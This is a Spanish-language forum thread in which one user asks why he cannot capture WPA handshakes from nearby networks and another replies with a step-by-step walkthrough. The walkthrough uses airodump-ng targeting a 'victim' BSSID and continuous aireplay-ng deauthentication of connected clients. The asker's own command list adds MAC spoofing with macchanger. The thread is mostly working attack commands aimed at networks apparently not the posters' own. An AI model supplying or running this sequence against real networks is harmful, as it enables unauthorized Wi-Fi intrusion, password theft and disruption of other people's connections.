Hola
El otro dia intente conseguir el famoso handshake, con estas 2 redes.
http://img20.imageshack.us/img20/3432/220620121491.jpg
http://img220.imageshack.us/img220/489/220620121485.jpg
Pero no lo he conseguido, he hecho el ataque con el MDK3, Desautentificacion,etc pero nada. He puesto la tarjeta wifi en modo auto,1M,2M,54M,etc nada
Pero lo rar, es que consegui este handshake con otra red, y la señal es menos potente que en las redes que estan en las imagenes.
Sera por el aparato wifi, por los paquetes falsos, por el driver ??? Si podeis echarme una mano......
El handshake se puede obtener cuando la víctima está generando tráfico en su PC, lo que hace el ataque es tirar la Red para que la víctima vuelva a reconectar y así poder autentificarse.
Saludos
Podrias poner que pasos estas haciendo?
sudo su
iwconfig
Miras el nombre de tu interfaz el mío es wlan0 tu usas el que te ponga a ti
Haces lo siguiente
ifconfig wlan0 down
iwconfig wlan0 mode monitor
airodump-ng wlan0 esto empezara a ver las redes que hay a tu alcance
Ctrl+c con esto detienes el proceso de escaneo de las redes
Abres otra terminal haces el siguiente paso
airodump-ng -c channel --bssid (MAC VICT) -w password wlan0
Lo dejas capturando i abres otra terminal
I ejecutas lo siguiente
aireplay-ng -0 0 -a (MAC VICT) -c (MAC CLIENT ASOCIAT) wlan0 (esto des autentificara cada cliente asociado siempre que pongas el Mac del cliente asociado en (MAC CLIENT ASOCIAT)
Cuando des autentifiques un cliente asociado con el comando que te puse hay
Por ejemplo -0 0 lo estará des autentificando constante mente
Lo dejas des autentifican doce constante dos o un minuto o tres o lo que tú quieras entonces para que en el airodump se capture el handshake debes pararlo después de 3 o 2 minutos con un Ctrl+c
Presionas la flecha de así riba en tu teclado en la misma terminal i luego Enter para que lo des autentifiques de nuevo
Y te mantienes haciendo eso una i otra vez con cada cliente asociado hasta que captures el handshake
Hola de nuevo
Los pasos que hago son estos
iwconfig
ifconfig wlan0 down
airmon-ng stop wlan0
macchanger -m 00:11:22:33:44:55 wlan0
iwconfig wlan0 rate 1M ( o auto )
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -w " red " -c " " --bssid " " wlan0
aireplay-ng -0 10 -a " MAC " -c "Station" wlan0
Hago este ataque, y lo dejo como 2 o 3 minutos, cambio de lugar pero nada sigue sin darmelo . He hecho el ataque en varias redes con el cliente conectado, pero nada no me lo quiere dar.